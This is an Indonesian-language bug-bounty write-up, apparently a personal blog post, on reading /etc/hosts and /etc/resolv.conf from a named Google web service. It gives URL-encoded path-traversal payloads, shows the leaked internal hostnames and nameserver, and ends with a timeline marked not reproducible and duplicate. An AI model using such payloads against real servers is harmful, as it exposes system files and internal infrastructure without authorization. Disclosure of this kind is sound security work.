paket wisata belitung

reading etc/hosts bug bounty google

reading etc/hosts bug bounty google

haii,
kali ini saya mau bikin writeups reading etc%2Fhosts dan etc%2Fresolv.conf
langsung saja deh.
step :
1.buka browser web https://uxr-optout.withgoogle.com/
2.setelah itu tambahkan payload %2F%2F%2Fetc%2Fhosts atau %2F%2F%2Fetc%2Fresolv.conf pada akhir web
3.seperti ini atau ini
4.selanjutnya akan menampilkan response dari %2Fetc%2Fhosts seperti ini
127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine
dan response etc%2Fresolv.conf seperti ini
nameserver 169.254.169.254 search google.internal.
5.dari payload tersebut server mengizinkan kita membaca system dari %2Fetc%2Fhosts dan etc%2Fresolv.conf
untuk video singkat silakhan kunjungi youtube saya
REPORT →: 28 Jul 2020 12.27
Assigned → Not Reproducible : 30 Jul 2020 20.46
DUPLICATE → 31 Jul 2020 21.46

Facebook | Twitter | WhatsApp | Cetak